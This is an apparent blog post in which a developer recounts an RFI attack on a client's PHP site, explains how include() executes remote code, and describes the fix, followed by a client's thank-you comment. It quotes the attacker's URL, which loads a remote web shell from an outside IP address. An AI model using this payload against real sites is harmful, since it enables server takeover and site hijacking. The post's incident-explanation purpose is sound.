Nasty PHP Exploit Rears Its Ugly Head (RFI Attack)

A panicked client of mine contacted me today with concerns about his website. Every few times we would load his company’s homepage, it would show an incorrect website. This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website. See the page that was being maliciously loaded here. So I got to work hunting down the source of the hijack.

With some help from the gurus at HostGator support, I finally found out how this was happening. The answer: RFI (“Remote File Inclusion”) Attack.

Most of our small websites we do in PHP. I pass off all of my PHP work to my code monkeys these days. The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy. The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground.

Vulnerable Code

What a lot of PHP developers don’t know is that the include() function will actually allow you to include even a remote file. So one could write include('http://apple.com'); , for instance, and insert the code from Apple’s website into the body of their own site. And to take it even one step further, the function doesn’t just include remote content. It also EXECUTES the included code.

This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and your web server will run it! And that’s exactly what our hacker did.

Malicious URL Used By Hacker

http://website.com/products.php?page=http://141.84.238.34/.../cmd?

Upon including “http://141.84.238.34/.../cmd?” at the end of url, it loaded up a simple yet impressive file management panel right in the middle of my beautiful website. Take a look. It’s really quite impressive. As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server. This attacker used this opportunity to redirect to a site of which he or she must’ve had some interest in the advertising revenue.

Well, the password has been changed and the vulnerability has been closed. I’m sure there is more than one way to secure this hole, but here is how I did it.

Cleaned Up Version Won’t execute remote code

The full dish: RFI Attack on Wikipedia

Responses

I was said "panicked customer" and just wanted to say thanks for fixing this. Having customers call us saying an insurance page was coming up was terrifying, especially when it could have very well been porn. Thanks Jon!

Respond